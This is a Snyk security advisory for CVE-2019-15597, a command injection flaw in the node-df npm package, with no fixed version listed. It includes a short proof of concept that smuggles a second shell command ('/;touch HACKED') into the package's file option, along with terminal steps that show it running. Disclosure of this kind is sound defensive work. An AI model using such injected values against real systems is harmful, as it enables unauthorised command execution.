Command Injection Affecting node-df package, versions *
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-NODEDF-536779
- published 5 Dec 2019
- disclosed 4 Dec 2019
- credit mik317
Introduced: 4 Dec 2019
CVE-2019-15597 Open this link in a new tabHow to fix?
There is no fixed version for node-df
.
Overview
node-df is a cross-platform Node.js wrapper around the standard Unix computer program (disk free).
Affected versions of this package are vulnerable to Command Injection. The issue occurs because a user input
is concatenated inside a command
that will be executed without any check.
PoC by mik317
// poc.js
var df = require('node-df');
var options = {
file: '/;touch HACKED',
prefixMultiplier: 'GB',
isDisplayPrefixMultiplier: true,
precision: 2
};
df(options, function (error, response) {
if (error) { throw error; }
console.log(JSON.stringify(response, null, 2));
});
Execute the following commands in terminal:
npm i node-df # Install affected module
ls # Make sure there isn't any HACKED file
node poc.js # Run the PoC
ls # The HACKED file has been created